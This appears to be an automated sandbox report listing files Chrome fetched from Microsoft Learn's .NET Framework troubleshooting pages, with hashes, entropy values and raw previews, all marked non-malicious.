                                                                                                                                                                                    Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:HMB:k
                                                                                                                                                                                    MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                    SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                    SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                    SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13339
                                                                                                                                                                                    Entropy (8bit):7.683569563478597
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                    MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                    SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                    SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                    SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                    Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):17174
                                                                                                                                                                                    Entropy (8bit):2.9129715116732746
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1817143
                                                                                                                                                                                    Entropy (8bit):5.501007973622959
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                    MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                    SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                    SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                    SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                    Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5644
                                                                                                                                                                                    Entropy (8bit):4.785769732002188
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                    MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                    SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                    SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                    SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):17174
                                                                                                                                                                                    Entropy (8bit):2.9129715116732746
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13842
                                                                                                                                                                                    Entropy (8bit):7.802399161550213
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                    MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                    SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                    SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                    SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                    Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):33148
                                                                                                                                                                                    Entropy (8bit):4.917595394577667
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                    MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                    SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                    SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                    SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5644
                                                                                                                                                                                    Entropy (8bit):4.785769732002188
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                    MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                    SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                    SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                    SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                    Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):64291
                                                                                                                                                                                    Entropy (8bit):7.964191793580486
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                    MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                    SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                    SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                    SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35005
                                                                                                                                                                                    Entropy (8bit):7.980061050467981
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                    MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                    SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                    SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                    SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                    Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4897
                                                                                                                                                                                    Entropy (8bit):4.8007377074457604
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                    MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                    SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                    SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                    SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                    Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                    Entropy (8bit):4.241202481433726
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                    MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                    SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                    SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                    SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                    Entropy (8bit):4.241202481433726
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                    MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                    SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                    SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                    SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):64291
                                                                                                                                                                                    Entropy (8bit):7.964191793580486
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                    MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                    SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                    SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                    SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
